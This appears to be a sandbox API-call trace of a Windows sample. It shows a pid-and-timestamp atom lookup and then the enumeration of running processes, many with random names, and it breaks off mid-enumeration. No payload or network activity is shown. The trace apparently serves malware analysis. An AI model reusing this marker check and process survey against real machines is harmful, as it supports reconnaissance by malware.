	[0075.292] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.292] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.292] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.292] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.292] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.292] CloseHandle (hObject=0x224) returned 1
	[0075.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.292] CloseHandle (hObject=0x224) returned 1
	[0075.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.293] CloseHandle (hObject=0x224) returned 1
	[0075.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0075.329] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.335] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.335] CloseHandle (hObject=0x224) returned 1
	[0075.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728838, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.335] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.335] CloseHandle (hObject=0x224) returned 1
	[0075.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.336] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.336] CloseHandle (hObject=0x224) returned 1
	[0075.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.336] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.336] CloseHandle (hObject=0x224) returned 1
	[0075.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.336] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.336] CloseHandle (hObject=0x224) returned 1
	[0075.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.336] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.337] CloseHandle (hObject=0x224) returned 1
	[0075.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.337] CloseHandle (hObject=0x224) returned 1
	[0075.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.337] CloseHandle (hObject=0x224) returned 1
	[0075.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.337] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.337] CloseHandle (hObject=0x224) returned 1
	[0075.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.338] CloseHandle (hObject=0x224) returned 1
	[0075.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.338] CloseHandle (hObject=0x224) returned 1
	[0075.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.338] CloseHandle (hObject=0x224) returned 1
	[0075.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7289b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.339] CloseHandle (hObject=0x224) returned 1
	[0075.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.339] CloseHandle (hObject=0x224) returned 1
	[0075.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728858, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.339] CloseHandle (hObject=0x224) returned 1
	[0075.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.339] CloseHandle (hObject=0x224) returned 1
	[0075.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.339] CloseHandle (hObject=0x224) returned 1
	[0075.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.340] CloseHandle (hObject=0x224) returned 1
	[0075.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.340] CloseHandle (hObject=0x224) returned 1
	[0075.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.340] CloseHandle (hObject=0x224) returned 1
	[0075.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.340] CloseHandle (hObject=0x224) returned 1
	[0075.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.341] CloseHandle (hObject=0x224) returned 1
	[0075.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.341] CloseHandle (hObject=0x224) returned 1
	[0075.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e770, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.341] CloseHandle (hObject=0x224) returned 1
	[0075.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.341] CloseHandle (hObject=0x224) returned 1
	[0075.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.341] CloseHandle (hObject=0x224) returned 1
	[0075.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.342] CloseHandle (hObject=0x224) returned 1
	[0075.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.342] CloseHandle (hObject=0x224) returned 1
	[0075.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
